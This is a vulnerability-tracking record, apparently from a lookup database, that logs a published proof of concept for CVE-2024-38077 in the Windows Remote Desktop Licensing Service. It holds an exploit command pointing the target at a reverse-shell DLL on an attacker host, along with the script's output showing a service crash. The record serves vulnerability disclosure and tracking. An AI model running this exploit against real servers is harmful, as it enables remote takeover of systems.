{"uuid": "b068f266-6f62-46e1-b032-c35fab5667ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/1744", "content": "all\n\npython3 CVE-2024-38077-EXP.py --evil_ip 103xxxx --evil_dll_path \\1\\reverse-shell.dll --target_ip 1xxx\n--------------------------------------------------------------------------------\nMadLicense: Windows Remote Desktop Licensing Service Preauth RCE\n        target_ip: 1xxx\n        evil_ip: 1xxxxx\n        evil_dll_path: \\\\10xxx1reverse-shell.dll\n        check_vuln_exist: False\n--------------------------------------------------------------------------------\n[*] Run exploit script for 1 / 3 times\n[+] Get Server version: 0x60000a04\n[-] Crashed, waiting for the service to restart, need 210 seconds...", "creation_timestamp": "2024-10-16T23:02:17.000000Z"}